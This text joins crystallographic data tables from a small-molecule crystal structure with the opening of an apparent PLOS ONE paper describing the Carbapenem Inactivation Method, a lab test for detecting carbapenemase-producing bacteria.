H12 0.1700 0.4379 0.0445 0.039\*
C13 0.15625 (7) 0.7498 (3) 0.05152 (5) 0.0380 (5)
H13A 0.1244 0.7253 0.0603 0.046\*
H13B 0.1432 0.7813 0.0253 0.046\*
C14 0.18892 (7) 0.9333 (3) 0.07187 (5) 0.0350 (5)
H14 0.1656 1.0598 0.0679 0.042\*
C15 0.23731 (7) 0.9710 (3) 0.05761 (5) 0.0387 (5)
H15A 0.2246 1.0045 0.0315 0.046\*
H15B 0.2586 1.0898 0.0705 0.046\*
C16 0.27263 (7) 0.7773 (3) 0.06352 (5) 0.0338 (5)
H16 0.3043 0.8024 0.0541 0.041\*
C17 0.29290 (7) 0.7285 (3) 0.10409 (5) 0.0345 (5)
H17A 0.3163 0.6043 0.1081 0.041\*
H17B 0.3146 0.8460 0.1171 0.041\*
C18 0.20872 (7) 0.8839 (3) 0.11237 (5) 0.0336 (5)
H18A 0.1774 0.8598 0.1217 0.040\*
H18B 0.2294 1.0030 0.1256 0.040\*
C19 0.23996 (7) 0.5952 (3) 0.04336 (5) 0.0357 (5)
H19A 0.2629 0.4697 0.0470 0.043\*
H19B 0.2273 0.6256 0.0171 0.043\*
O21 0.63002 (5) 0.95579 (19) 0.15600 (3) 0.0426 (4)
N21 0.67083 (8) 0.6087 (4) 0.19276 (5) 0.0466 (6)
C21 0.61810 (8) 0.5686 (3) 0.19077 (5) 0.0310 (5)
C22 0.60638 (8) 0.3934 (3) 0.20847 (5) 0.0376 (5)
H22 0.6347 0.3006 0.2199 0.045\*
C23 0.55515 (9) 0.3530 (3) 0.20973 (5) 0.0409 (6)
H23 0.5486 0.2347 0.2225 0.049\*
C24 0.51230 (8) 0.4830 (3) 0.19257 (5) 0.0391 (5)
H24 0.4767 0.4554 0.1936 0.047\*
C25 0.52287 (7) 0.6526 (3) 0.17406 (5) 0.0321 (5)
H25 0.4938 0.7398 0.1616 0.039\*
C26 0.57499 (7) 0.6995 (3) 0.17309 (5) 0.0255 (5)
C27 0.58532 (8) 0.8871 (3) 0.15428 (5) 0.0300 (5)
O28 0.53969 (4) 0.97894 (19) 0.13458 (3) 0.0327 (3)
C29 0.54562 (7) 1.1712 (3) 0.11641 (5) 0.0317 (5)
H29A 0.5767 1.1605 0.1064 0.038\*
H29B 0.5525 1.2873 0.1339 0.038\*
C30 0.49414 (7) 1.2116 (3) 0.08609 (5) 0.0244 (5)
C31 0.48638 (7) 1.0487 (3) 0.05613 (4) 0.0301 (5)
H31A 0.5183 1.0480 0.0469 0.036\*
H31B 0.4831 0.9098 0.0661 0.036\*
C32 0.43554 (7) 1.0966 (3) 0.02513 (5) 0.0310 (5)
H32 0.4308 0.9889 0.0059 0.037\*
C33 0.38650 (7) 1.0953 (3) 0.03946 (5) 0.0374 (6)
H33A 0.3825 0.9568 0.0494 0.045\*
H33B 0.3535 1.1249 0.0195 0.045\*
C34 0.39332 (7) 1.2585 (3) 0.06906 (5) 0.0343 (5)
H34 0.3611 1.2570 0.0784 0.041\*
C35 0.39899 (7) 1.4717 (3) 0.05345 (5) 0.0368 (5)
H35A 0.4035 1.5783 0.0725 0.044\*
H35B 0.3659 1.5047 0.0337 0.044\*
C36 0.44816 (7) 1.4731 (3) 0.03881 (5) 0.0308 (5)
H36 0.4518 1.6128 0.0286 0.037\*
C37 0.49895 (7) 1.4253 (3) 0.06989 (4) 0.0286 (5)
H37A 0.5038 1.5326 0.0889 0.034\*
H37B 0.5310 1.4280 0.0608 0.034\*
C38 0.44432 (6) 1.2112 (3) 0.09989 (4) 0.0306 (5)
H38A 0.4407 1.0740 0.1104 0.037\*
H38B 0.4488 1.3165 0.1192 0.037\*
C39 0.44104 (7) 1.3093 (3) 0.00931 (5) 0.0346 (5)
H39A 0.4727 1.3104 −0.0002 0.041\*
H39B 0.4083 1.3401 −0.0109 0.041\*
H1B 0.2805 (7) 0.125 (3) 0.2443 (5) 0.054 (7)\*
H21B 0.6966 (9) 0.517 (3) 0.2037 (6) 0.094 (10)\*
H1A 0.3045 (8) −0.098 (3) 0.2590 (5) 0.073 (9)\*
H21A 0.6781 (7) 0.722 (3) 0.1807 (5) 0.058 (8)\*
------ ------------- -------------- ------------- -------------------- --
Atomic displacement parameters (Å^2^) {#tablewrapadps}
=====================================
----- ------------- ------------- ------------- -------------- -------------- --------------
*U*^11^ *U*^22^ *U*^33^ *U*^12^ *U*^13^ *U*^23^
O1 0.0435 (9) 0.0695 (12) 0.0492 (10) 0.0164 (8) 0.0257 (8) 0.0112 (8)
N1 0.0432 (12) 0.0529 (16) 0.0355 (13) −0.0100 (12) 0.0158 (10) 0.0053 (12)
C1 0.0284 (12) 0.0392 (14) 0.0219 (12) −0.0115 (11) 0.0062 (10) −0.0021 (11)
C2 0.0480 (14) 0.0317 (14) 0.0287 (13) −0.0019 (12) 0.0061 (12) 0.0079 (11)
C3 0.0460 (14) 0.0404 (15) 0.0404 (14) 0.0098 (11) 0.0127 (12) 0.0029 (12)
C4 0.0452 (14) 0.0486 (16) 0.0421 (15) 0.0107 (12) 0.0240 (11) 0.0114 (13)
C5 0.0370 (13) 0.0396 (15) 0.0274 (13) 0.0035 (11) 0.0133 (11) 0.0069 (11)
C6 0.0211 (11) 0.0283 (13) 0.0240 (12) −0.0006 (10) 0.0035 (10) 0.0013 (10)
C7 0.0334 (13) 0.0379 (14) 0.0240 (13) −0.0071 (11) 0.0083 (11) 0.0017 (12)
O8 0.0392 (8) 0.0427 (9) 0.0329 (9) 0.0116 (7) 0.0091 (7) 0.0055 (8)
C9 0.0362 (12) 0.0390 (14) 0.0389 (14) 0.0087 (11) 0.0042 (11) −0.0053 (11)
C10 0.0303 (12) 0.0310 (13) 0.0191 (12) −0.0015 (10) 0.0051 (10) 0.0010 (10)
C11 0.0352 (11) 0.0279 (12) 0.0277 (12) −0.0031 (10) 0.0131 (9) −0.0019 (10)
C12 0.0372 (12) 0.0319 (14) 0.0252 (13) −0.0100 (10) 0.0050 (10) −0.0052 (10)
C13 0.0366 (12) 0.0472 (15) 0.0293 (13) −0.0004 (12) 0.0083 (10) 0.0025 (12)
C14 0.0384 (13) 0.0295 (14) 0.0361 (14) 0.0084 (10) 0.0092 (11) 0.0024 (11)
C15 0.0450 (13) 0.0280 (13) 0.0428 (14) −0.0057 (11) 0.0123 (11) 0.0031 (11)
C16 0.0337 (12) 0.0318 (13) 0.0392 (14) −0.0045 (11) 0.0160 (11) 0.0013 (11)
C17 0.0271 (11) 0.0305 (13) 0.0439 (15) 0.0009 (10) 0.0070 (11) −0.0006 (11)
C18 0.0416 (12) 0.0302 (13) 0.0296 (13) 0.0076 (10) 0.0114 (10) 0.0003 (10)
C19 0.0480 (13) 0.0329 (13) 0.0283 (13) 0.0034 (11) 0.0146 (11) 0.0038 (11)
O21 0.0267 (8) 0.0497 (10) 0.0507 (10) −0.0001 (8) 0.0104 (7) 0.0114 (8)
N21 0.0338 (13) 0.0507 (15) 0.0521 (14) 0.0090 (12) 0.0077 (11) 0.0114 (12)
C21 0.0349 (13) 0.0371 (14) 0.0206 (12) 0.0017 (11) 0.0077 (10) −0.0049 (11)
C22 0.0454 (14) 0.0353 (14) 0.0266 (13) 0.0074 (12) 0.0016 (11) 0.0000 (11)
C23 0.0613 (16) 0.0279 (14) 0.0324 (14) −0.0001 (12) 0.0122 (13) 0.0038 (11)
C24 0.0408 (13) 0.0379 (14) 0.0427 (14) −0.0015 (12) 0.0186 (11) 0.0032 (12)
C25 0.0354 (13) 0.0299 (13) 0.0298 (13) 0.0041 (10) 0.0073 (10) 0.0020 (11)
C26 0.0280 (12) 0.0264 (13) 0.0221 (12) 0.0030 (10) 0.0072 (10) 0.0013 (10)
C27 0.0255 (12) 0.0394 (14) 0.0240 (12) 0.0069 (11) 0.0055 (11) −0.0005 (11)
O28 0.0267 (7) 0.0332 (9) 0.0345 (8) −0.0012 (7) 0.0032 (6) 0.0119 (7)
C29 0.0330 (12) 0.0282 (13) 0.0311 (13) −0.0032 (10) 0.0049 (10) 0.0056 (11)
C30 0.0262 (11) 0.0238 (12) 0.0217 (12) −0.0007 (9) 0.0046 (10) 0.0022 (10)
C31 0.0364 (12) 0.0224 (12) 0.0313 (12) −0.0003 (10) 0.0095 (10) 0.0026 (10)
C32 0.0429 (13) 0.0259 (13) 0.0221 (12) −0.0067 (10) 0.0063 (11) −0.0050 (10)
C33 0.0316 (12) 0.0385 (14) 0.0341 (13) −0.0098 (10) −0.0030 (11) 0.0100 (11)
C34 0.0256 (12) 0.0456 (15) 0.0324 (13) 0.0023 (10) 0.0095 (10) 0.0097 (12)
C35 0.0359 (12) 0.0401 (15) 0.0310 (13) 0.0075 (11) 0.0044 (10) 0.0030 (11)
C36 0.0384 (12) 0.0232 (12) 0.0299 (13) −0.0018 (10) 0.0086 (10) 0.0068 (11)
C37 0.0327 (11) 0.0248 (13) 0.0272 (12) −0.0028 (10) 0.0071 (10) 0.0006 (10)
C38 0.0354 (12) 0.0332 (13) 0.0240 (12) −0.0009 (10) 0.0099 (10) 0.0031 (10)
C39 0.0357 (12) 0.0363 (14) 0.0290 (13) −0.0015 (10) 0.0051 (10) 0.0043 (11)
----- ------------- ------------- ------------- -------------- -------------- --------------
Geometric parameters (Å, °) {#tablewrapgeomlong}
===========================
------------------- ------------- ------------------- -------------
O1---C7 1.211 (2) O21---C27 1.2222 (19)
N1---C1 1.372 (2) N21---C21 1.368 (2)
N1---H1B 0.961 (17) N21---H21B 0.90 (2)
N1---H1A 0.913 (19) N21---H21A 0.912 (18)
C1---C2 1.399 (2) C21---C22 1.400 (2)
C1---C6 1.412 (2) C21---C26 1.408 (2)
C2---C3 1.370 (2) C22---C23 1.365 (2)
C2---H2 0.9500 C22---H22 0.9500
C3---C4 1.384 (2) C23---C24 1.395 (2)
C3---H3 0.9500 C23---H23 0.9500
C4---C5 1.368 (2) C24---C25 1.378 (2)
C4---H4 0.9500 C24---H24 0.9500
C5---C6 1.392 (2) C25---C26 1.393 (2)
C5---H5 0.9500 C25---H25 0.9500
C6---C7 1.476 (2) C26---C27 1.476 (2)
C7---O8 1.3379 (19) C27---O28 1.3422 (19)
O8---C9 1.4688 (18) O28---C29 1.4562 (18)
C9---C10 1.512 (2) C29---C30 1.518 (2)
C9---H9A 0.9900 C29---H29A 0.9900
C9---H9B 0.9900 C29---H29B 0.9900
C10---C17 1.530 (2) C30---C38 1.531 (2)
C10---C11 1.535 (2) C30---C31 1.533 (2)
C10---C18 1.540 (2) C30---C37 1.535 (2)
C11---C12 1.535 (2) C31---C32 1.531 (2)
C11---H11A 0.9900 C31---H31A 0.9900
C11---H11B 0.9900 C31---H31B 0.9900
C12---C13 1.519 (2) C32---C33 1.524 (2)
C12---C19 1.528 (2) C32---C39 1.526 (2)
C12---H12 1.0000 C32---H32 1.0000
C13---C14 1.533 (2) C33---C34 1.527 (2)
C13---H13A 0.9900 C33---H33A 0.9900
C13---H13B 0.9900 C33---H33B 0.9900
C14---C15 1.526 (2) C34---C35 1.527 (2)
C14---C18 1.531 (2) C34---C38 1.529 (2)
C14---H14 1.0000 C34---H34 1.0000
C15---C16 1.526 (2) C35---C36 1.535 (2)
C15---H15A 0.9900 C35---H35A 0.9900
C15---H15B 0.9900 C35---H35B 0.9900
C16---C19 1.523 (2) C36---C39 1.526 (2)
C16---C17 1.534 (2) C36---C37 1.531 (2)
C16---H16 1.0000 C36---H36 1.0000
C17---H17A 0.9900 C37---H37A 0.9900
C17---H17B 0.9900 C37---H37B 0.9900
C18---H18A 0.9900 C38---H38A 0.9900
C18---H18B 0.9900 C38---H38B 0.9900
C19---H19A 0.9900 C39---H39A 0.9900
C19---H19B 0.9900 C39---H39B 0.9900
C1---N1---H1B 117.1 (11) C21---N21---H21B 119.5 (14)
C1---N1---H1A 116.6 (13) C21---N21---H21A 118.2 (12)
H1B---N1---H1A 117.9 (18) H21B---N21---H21A 122.0 (18)
N1---C1---C2 119.7 (2) N21---C21---C22 118.7 (2)
N1---C1---C6 122.2 (2) N21---C21---C26 123.3 (2)
C2---C1---C6 117.99 (18) C22---C21---C26 117.94 (19)
C3---C2---C1 121.22 (19) C23---C22---C21 121.48 (19)
C3---C2---H2 119.4 C23---C22---H22 119.3
C1---C2---H2 119.4 C21---C22---H22 119.3
C2---C3---C4 121.0 (2) C22---C23---C24 120.88 (19)
C2---C3---H3 119.5 C22---C23---H23 119.6
C4---C3---H3 119.5 C24---C23---H23 119.6
C5---C4---C3 118.41 (19) C25---C24---C23 118.35 (18)
C5---C4---H4 120.8 C25---C24---H24 120.8
C3---C4---H4 120.8 C23---C24---H24 120.8
C4---C5---C6 122.36 (19) C24---C25---C26 121.76 (18)
C4---C5---H5 118.8 C24---C25---H25 119.1
C6---C5---H5 118.8 C26---C25---H25 119.1
C5---C6---C1 118.95 (18) C25---C26---C21 119.53 (18)
C5---C6---C7 120.69 (18) C25---C26---C27 120.45 (17)
C1---C6---C7 120.29 (18) C21---C26---C27 120.00 (18)
O1---C7---O8 122.43 (19) O21---C27---O28 122.17 (18)
O1---C7---C6 125.50 (19) O21---C27---C26 125.10 (18)
O8---C7---C6 112.08 (18) O28---C27---C26 112.73 (17)
C7---O8---C9 117.37 (15) C27---O28---C29 116.84 (14)
O8---C9---C10 108.72 (15) O28---C29---C30 109.06 (14)
O8---C9---H9A 109.9 O28---C29---H29A 109.9
C10---C9---H9A 109.9 C30---C29---H29A 109.9
O8---C9---H9B 109.9 O28---C29---H29B 109.9
C10---C9---H9B 109.9 C30---C29---H29B 109.9
H9A---C9---H9B 108.3 H29A---C29---H29B 108.3
C9---C10---C17 112.57 (15) C29---C30---C38 111.68 (14)
C9---C10---C11 110.47 (15) C29---C30---C31 110.92 (14)
C17---C10---C11 108.91 (15) C38---C30---C31 108.83 (14)
C9---C10---C18 107.19 (15) C29---C30---C37 108.17 (14)
C17---C10---C18 109.11 (15) C38---C30---C37 108.64 (14)
C11---C10---C18 108.48 (14) C31---C30---C37 108.53 (14)
C12---C11---C10 110.00 (14) C32---C31---C30 110.24 (14)
C12---C11---H11A 109.7 C32---C31---H31A 109.6
C10---C11---H11A 109.7 C30---C31---H31A 109.6
C12---C11---H11B 109.7 C32---C31---H31B 109.6
C10---C11---H11B 109.7 C30---C31---H31B 109.6
H11A---C11---H11B 108.2 H31A---C31---H31B 108.1
C13---C12---C19 109.38 (16) C33---C32---C39 109.54 (15)
C13---C12---C11 109.92 (15) C33---C32---C31 109.36 (15)
C19---C12---C11 109.37 (14) C39---C32---C31 109.63 (15)
C13---C12---H12 109.4 C33---C32---H32 109.4
C19---C12---H12 109.4 C39---C32---H32 109.4
C11---C12---H12 109.4 C31---C32---H32 109.4
C12---C13---C14 109.60 (14) C32---C33---C34 109.93 (15)
C12---C13---H13A 109.7 C32---C33---H33A 109.7
C14---C13---H13A 109.7 C34---C33---H33A 109.7
C12---C13---H13B 109.7 C32---C33---H33B 109.7
C14---C13---H13B 109.8 C34---C33---H33B 109.7
H13A---C13---H13B 108.2 H33A---C33---H33B 108.2
C15---C14---C18 109.61 (15) C33---C34---C35 109.28 (15)
C15---C14---C13 109.02 (15) C33---C34---C38 109.33 (15)
C18---C14---C13 109.49 (15) C35---C34---C38 109.11 (15)
C15---C14---H14 109.6 C33---C34---H34 109.7
C18---C14---H14 109.6 C35---C34---H34 109.7
C13---C14---H14 109.6 C38---C34---H34 109.7
C16---C15---C14 109.49 (15) C34---C35---C36 109.62 (15)
C16---C15---H15A 109.8 C34---C35---H35A 109.7
C14---C15---H15A 109.8 C36---C35---H35A 109.7
C16---C15---H15B 109.8 C34---C35---H35B 109.7
C14---C15---H15B 109.8 C36---C35---H35B 109.7
H15A---C15---H15B 108.2 H35A---C35---H35B 108.2
C19---C16---C15 109.71 (15) C39---C36---C37 109.59 (15)
C19---C16---C17 109.71 (15) C39---C36---C35 109.73 (15)
C15---C16---C17 109.45 (15) C37---C36---C35 108.90 (14)
C19---C16---H16 109.3 C39---C36---H36 109.5
C15---C16---H16 109.3 C37---C36---H36 109.5
C17---C16---H16 109.3 C35---C36---H36 109.5
C10---C17---C16 109.93 (14) C36---C37---C30 110.36 (14)
C10---C17---H17A 109.7 C36---C37---H37A 109.6
C16---C17---H17A 109.7 C30---C37---H37A 109.6
C10---C17---H17B 109.7 C36---C37---H37B 109.6
C16---C17---H17B 109.7 C30---C37---H37B 109.6
H17A---C17---H17B 108.2 H37A---C37---H37B 108.1
C14---C18---C10 110.02 (14) C34---C38---C30 110.57 (14)
C14---C18---H18A 109.7 C34---C38---H38A 109.5
C10---C18---H18A 109.7 C30---C38---H38A 109.5
C14---C18---H18B 109.7 C34---C38---H38B 109.5
C10---C18---H18B 109.7 C30---C38---H38B 109.5
H18A---C18---H18B 108.2 H38A---C38---H38B 108.1
C16---C19---C12 109.24 (15) C36---C39---C32 109.27 (15)
C16---C19---H19A 109.8 C36---C39---H39A 109.8
C12---C19---H19A 109.8 C32---C39---H39A 109.8
C16---C19---H19B 109.8 C36---C39---H39B 109.8
C12---C19---H19B 109.8 C32---C39---H39B 109.8
H19A---C19---H19B 108.3 H39A---C39---H39B 108.3
------------------- ------------- ------------------- -------------
Hydrogen-bond geometry (Å, °) {#tablewraphbondslong}
=============================
--------------------- ------------ ------------ ----------- ---------------
*D*---H···*A* *D*---H H···*A* *D*···*A* *D*---H···*A*
N1---H1B···O1 0.961 (17) 2.030 (18) 2.729 (3) 128.0 (14)
N21---H21B···N1^i^ 0.90 (2) 2.64 (2) 3.385 (3) 140.9 (17)
N1---H1A···O1^ii^ 0.913 (19) 2.47 (2) 2.930 (2) 111.4 (15)
N1---H1A···N21^iii^ 0.913 (19) 2.60 (2) 3.511 (3) 173.4 (17)
N21---H21A···O21 0.912 (18) 2.014 (19) 2.698 (3) 130.6 (16)
N21---H21A···O1^i^ 0.912 (18) 2.641 (18) 3.097 (2) 111.8 (14)
--------------------- ------------ ------------ ----------- ---------------
Symmetry codes: (i) *x*+1/2, *y*+1/2, *z*; (ii) −*x*+1/2, *y*−1/2, −*z*+1/2; (iii) −*x*+1, *y*−1, −*z*+1/2.
###### Hydrogen-bond geometry (Å, °)
*D*---H⋯*A* *D*---H H⋯*A* *D*⋯*A* *D*---H⋯*A*
--------------------- ------------ ------------ ----------- -------------
N1---H1*B*⋯O1 0.961 (17) 2.030 (18) 2.729 (3) 128.0 (14)
N21---H21*B*⋯N1^i^ 0.90 (2) 2.64 (2) 3.385 (3) 140.9 (17)
N1---H1*A*⋯O1^ii^ 0.913 (19) 2.47 (2) 2.930 (2) 111.4 (15)
N1---H1*A*⋯N21^iii^ 0.913 (19) 2.60 (2) 3.511 (3) 173.4 (17)
N21---H21*A*⋯O21 0.912 (18) 2.014 (19) 2.698 (3) 130.6 (16)
N21---H21*A*⋯O1^i^ 0.912 (18) 2.641 (18) 3.097 (2) 111.8 (14)
Symmetry codes: (i) ; (ii) ; (iii) .
| 2023-08-20T01:27:15.642919 | https://example.com/article/4936 |
All relevant data are within the paper.
Introduction {#sec001}
============
The emergence and spread of carbapenemase-producing Gram-negative rods is a worldwide emerging public health threat \[[@pone.0123690.ref001]--[@pone.0123690.ref003]\]. Particularly in health care centers, this may pose a major problem as carbapenems are becoming more frequently needed to treat infections caused by Gram-negative bacteria that produce extended spectrum beta-lactamases (ESBL) \[[@pone.0123690.ref004],[@pone.0123690.ref005]\]. To prevent spread of carbapenemase producers, rapid detection of these bacteria has become imperative \[[@pone.0123690.ref006]\]. Resistance to carbapenems is assessed in phenotypic susceptibility assays either on agar plates or in automated microbiology systems. However, high or low minimal inhibitory concentrations (MICs) do not necessarily reflect the production of carbapenemases, as other mechanisms such as porin loss or increased efflux pump activity, due to alterations in chromosomally located genes, can also cause resistance \[[@pone.0123690.ref007],[@pone.0123690.ref008]\]. Since carbapenemase-encoding genes are often located on plasmids, this type of resistance is much more likely to spread \[[@pone.0123690.ref009]\]. Therefore, distinction between carbapenem-resistance mediated by carbapenemases and resistance mediated by other mechanisms is important for infection control. To identify possible carbapenemase involvement, PCRs targeting the genes encoding carbapenemases are often employed \[[@pone.0123690.ref010]--[@pone.0123690.ref012]\]. These methods can only detect known carbapenemase encoding genes and the number of carbapenemase encoding genes and allelic variants thereof is expanding rapidly. In contrast, a phenotypic assay may detect carbapenemase activity irrespective of the carbapenemase encoding gene sequence. In 2012, Nordmann et al. reported a new phenotypic test to detect the capability of an isolate to hydrolyse imipenem, the Carba NP test \[[@pone.0123690.ref013],[@pone.0123690.ref014]\]. Even though this method is a huge improvement over methods such as the Modified Hodge Test, the costs are relatively high and some groups have reported difficulties with the Carba NP test, especially with mucoid isolates or isolates with weak carbapenemases such as OXA-48 \[[@pone.0123690.ref015]\]. In these cases only a subtle color change is observed which can easily be missed. This triggered us to develop an alternative bioassay designated as the Carbapenem Inactivation Method (CIM).
Materials and Methods {#sec002}
=====================
Strains and culture media {#sec003}
-------------------------
For validation of the CIM, a selection of 30 Gram-negative isolates was used. This selection included isolates obtained from different institutes across the world carrying known carbapenemase encoding genes and carbapenem susceptible isolates, according to the submitter ([Table 1](#pone.0123690.t001){ref-type="table"}). In addition, 694 isolates submitted to the National Institute for Public Health and the Environment for the national surveillance of carbapenemase-producing *Enterobacteriaceae* (CPE) by Dutch medical microbiology laboratories (MMLs) during the first six months of 2012 and the first six months of 2013 were used. For the national surveillance of CPE in the Netherlands, Dutch MMLs are requested to submit *Enterobacteriaceae* isolates with an MIC for meropenem \> 0.25 μg/ml. However, more than half of the isolates (411/694, 59%) sent in for CPE surveillance were non-fermenting Gram-negatives belonging to the genera *Pseudomonas* and *Acinetobacter*. Furthermore, 35% of the isolates had MICs below 0.25 μg/ml. Nevertheless, all isolates were included in this study.
10.1371/journal.pone.0123690.t001
###### Isolates used for validation of the CIM.
{#pone.0123690.t001g}
Species carbapenemase gene CIM CarbaNP
---------------------------------------------------------------------- -------------------- ----- ---------
*Klebsiella pneumoniae* [^*1*^](#t001fn001){ref-type="table-fn"} KPC-2 \+ \+
*Klebsiella pneumoniae* [^*1*^](#t001fn001){ref-type="table-fn"} NDM-1 \+ \+
*Klebsiella pneumoniae* [^*1*^](#t001fn001){ref-type="table-fn"} OXA-48 \+ \+
*Klebsiella pneumonia* OXA-48 \+ \+
*Klebsiella pneumonia* \- \-
*Klebsiella pneumonia* \- \-
*Klebsiella pneumonia* \- \-
*Escherichia coli* \- \-
*Escherichia coli* \- \-
*Escherichia coli* \- \-
*Escherichia coli* \- \-
*Escherichia coli* \- \-
*Escherichia coli* ATCC25922[^*1*^](#t001fn001){ref-type="table-fn"} \- \-
*Enterobacter cloacae* \- \-
*Enterobacter cloacae* \- \-
*Salmonella* Bareilly \- \-
*Salmonella* Heidelberg \- \-
*Pseudomonas aeruginosa* [^*1*^](#t001fn001){ref-type="table-fn"} VIM-2 \+ \+
*Pseudomonas aeruginosa* VIM-2 \+ \+
*Pseudomonas aeruginosa* [^*1*^](#t001fn001){ref-type="table-fn"} IMP-1 \+ \+
*Pseudomonas aeruginosa* [^*1*^](#t001fn001){ref-type="table-fn"} GIM-1 \+ \+
*Pseudomonas aeruginosa* [^*1*^](#t001fn001){ref-type="table-fn"} SPM-1 \+ \+
*Pseudomonas aeruginosa* AIM-1 \+ \+
*Pseudomonas fluorescens* BIC-1 \+ \-
*Pseudomonas stutzeri* [^*1*^](#t001fn001){ref-type="table-fn"} DIM-1 \+ \+
*Acinetobacter baumannii* OXA-23 \+ \+
*Acinetobacter baumannii* OXA-40 \+ \+
*Acinetobacter baumannii* OXA-58 \+ \+
*Acinetobacter baumannii* OXA-143 \+ \+
*Acinetobacter baumannii* [^*1*^](#t001fn001){ref-type="table-fn"} SIM-1 \+ \+
^1^subset used for testing robustness
The species identification, as performed by the MMLs, was confirmed using MALDI-TOF (Bruker Daltonics GmbH, Bremen, Germany) and the MIC for all isolates was confirmed by E-test (BioMerieux Inc., Marcy L'Etoile, France). Culturing of isolates was done on Columbia Sheep Blood (bioTRADING Benelux BV, Mijdrecht, The Netherlands) and Mueller-Hinton agarplates (Oxoid Ltd, Hampshire, United Kingdom). An overview of all CPE surveillance isolates and their characteristics is displayed in Tables [2](#pone.0123690.t002){ref-type="table"} and [3](#pone.0123690.t003){ref-type="table"}.
10.1371/journal.pone.0123690.t002
###### Characteristics of *Enterobacteriaceae* isolates submitted for CPE surveillance during the first halves of 2012 and 2013.
{#pone.0123690.t002g}
MIC \>0.25 μg/ml MIC ≤0.25 μg/ml
-------------------------------- -------- ----- ------ ------------------ ---- ----------------- ----- ----
*Klebsiella pneumoniae* (88) IMP 2 2.3 2 2
KPC 5 5.7 5 5
NDM 8 9.1 8 8
OXA-48 26 29.5 25 25 1 1
VIM 1 1.1 1 1
pos. 42 47.7 41 41 1 1
neg. 46 52.3 24 2 22 0
*Escherichia coli* (43) IMP
KPC
NDM 7 16.3 7 7
OXA-48 13 30.2 12 12 1 1
VIM 1 2.3 1 1
pos. 21 48.8 20 20 1 1
neg. 22 51.2 12 1 10 0
*Enterobacter cloacae*(72) IMP
KPC
NDM
OXA-48 3 4.2 3 3
VIM 1 1.4 1 1
pos. 4 5.6 4 4
neg. 68 94.4 48 0 20 0
Other *Enterobacteriaceae*(80) IMP
KPC
NDM 1 1.3 1 1
OXA-48
VIM 2 2.5 1 1 1 1
pos. 3 3.8 2 2 1 1
neg. 77 96.3 17 0 60 0
All *Enterobacteriaceae* (283) IMP 2 0.7 2 2
KPC 5 1.8 5 5
NDM 16 5.7 16 16
OXA-48 42 14.8 40 40 2 2
VIM 5 1.8 4 4 1 1
pos. 70 24.7 67 67 3 3
neg. 213 75.3 101 3 112 0
N, total number of isolates
n, number of isolates within the MIC-category
10.1371/journal.pone.0123690.t003
###### Characteristics of non-fermenter isolates submitted for CPE during the first halves of 2012 and 2013.
{#pone.0123690.t003g}
MIC \>0.25 μg/ml MIC ≤0.25 μg/ml
-------------------------------- --------------------------------------------- ----- ------- ------------------ ------------------------------------------- ----------------- --- ----
*Pseudomonas aeruginosa* (320) IMP 4 1.3 4 4
KPC
NDM
OXA-48
VIM 43 13.4 43 43
pos. 47 14.7 47 47
neg. 273 85.3 268 1 5 0
Other *Pseudomonas* spp. (67) IMP 2 3.0 2 2
KPC
NDM
OXA-48
VIM 6 9.0 6 6
pos. 8 11.9 8 8
neg. 59 88.1 58 5 1 0
*Acinetobacter baumannii* (18) IMP
KPC
NDM 1 5.6 1 1
OXA-23[\*](#t003fn003){ref-type="table-fn"} 12 66.7 12 10
OXA-48
VIM
pos. 12 66.7 12 10[\*\*](#t003fn004){ref-type="table-fn"}
neg. 6 33.3 6 1
Other *Acinetobacter* spp. (6) IMP
KPC
NDM
OXA-23[\*](#t003fn003){ref-type="table-fn"}
OXA-48
VIM
pos.
neg. 6 100.0 6 0
All *non-fermenters* (411) IMP 6 1.5 6 6
KPC
NDM 1 0.2 1 1
OXA-23[\*](#t003fn003){ref-type="table-fn"} 12 2.4 12 10
OXA-48
VIM 49 11.9 49 49
pos. 67 16.3 67 65
neg. 344 83.7 338 7 6 0
N, total number of isolates
n, number of isolates within the MIC-category
\* OXA-23 PCR was performed on *Acinetobacter* isolates only
\*\* One *Acinetobacter baumannii* isolate was found positive for both NDM and OXA-23
The Carbapenem Inactivation Method {#sec004}
----------------------------------
To perform the CIM, a suspension was made by suspending a full 10 μl inoculation loop of culture, taken from a Mueller-Hinton or blood agar plate in 400 μl water. Subsequently, a susceptibility-testing disk containing 10 μg meropenem (Oxoid Ltd, Hampshire, United Kingdom) was immersed in the suspension and incubated for a minimum of two hours at 35°C. After incubation, the disk was removed from the suspension using an inoculation loop, placed on a Mueller-Hinton agar plate inoculated with a susceptible *E*. *coli* indicator strain (ATCC 29522) and subsequently incubated at 35°C. Inoculation of the Mueller-Hinton agar plate with the indicator strain was done with a suspension of OD~595~ 1.25 (correlates with a McFarland value of 0.5) streaked in three directions using a sterile cotton swab. If the bacterial isolate produced carbapenemase, the meropenem in the susceptibility disk was inactivated allowing uninhibited growth of the susceptible indicator strain. Disks incubated in suspensions that do not contain carbapenemases yielded a clear inhibition zone. If results are required within the same day, they can be read after six hours, but within the setting of our laboratory, we prefer reading results after overnight incubation ([Fig. 1](#pone.0123690.g001){ref-type="fig"}).
{#pone.0123690.g001}
PCR to detect the presence of carbapenemase encoding genes {#sec005}
----------------------------------------------------------
A multiplex PCR that detects the genes encoding the predominant carbapenemases KPC, NDM, OXA-48like, VIM and IMP was used. To serve as an internal positive control, primers detecting the bacterial 23S rRNA gene were incorporated. This multiplex PCR was developed in-house and combines previously published (OXA-48L \[[@pone.0123690.ref010]\], IMP \[[@pone.0123690.ref011]\] and 23S \[[@pone.0123690.ref016]\]) and newly designed primers (KPC, NDM and VIM). For PCR, 12.5 μl of QiaGen Multiplex mix (QiaGen GmbH, Hilden, Germany) was mixed with 2 pmol of forward and reverse primers for KPC, OXA-48, VIM and 23S and with 6 pmol of the forward and reverse primers for NDM and IMP and supplemented with water to reach a final volume of 23 μl. Two μl of boilate from an isolate was added to the mix and 25 PCR cycles of 60 sec denaturation at 95°C, 60 sec annealing at 57.5°C and 60 sec elongation at 72°C were run. In addition, *Acinetobacter* isolates were tested for the presence of the gene encoding for OXA-23 in a separate PCR \[[@pone.0123690.ref012]\]. Finally, for isolates that demonstrated carbapenemase activity using the CIM, but did not yield a PCR product using the multiplex PCR described above, three additional PCRs were performed. These separate PCRs, targeting BIC \[[@pone.0123690.ref011]\] and additional variants of OXA-48L and IMP \[[@pone.0123690.ref017]\], were performed using 10 pmol of each primer and the same PCR conditions as the multiplex PCR.
The primer sequences and the expected PCR product sizes are listed in [Table 4](#pone.0123690.t004){ref-type="table"}.
10.1371/journal.pone.0123690.t004
###### Primers used for PCR detection of carbapenemase encoding genes.
{#pone.0123690.t004g}
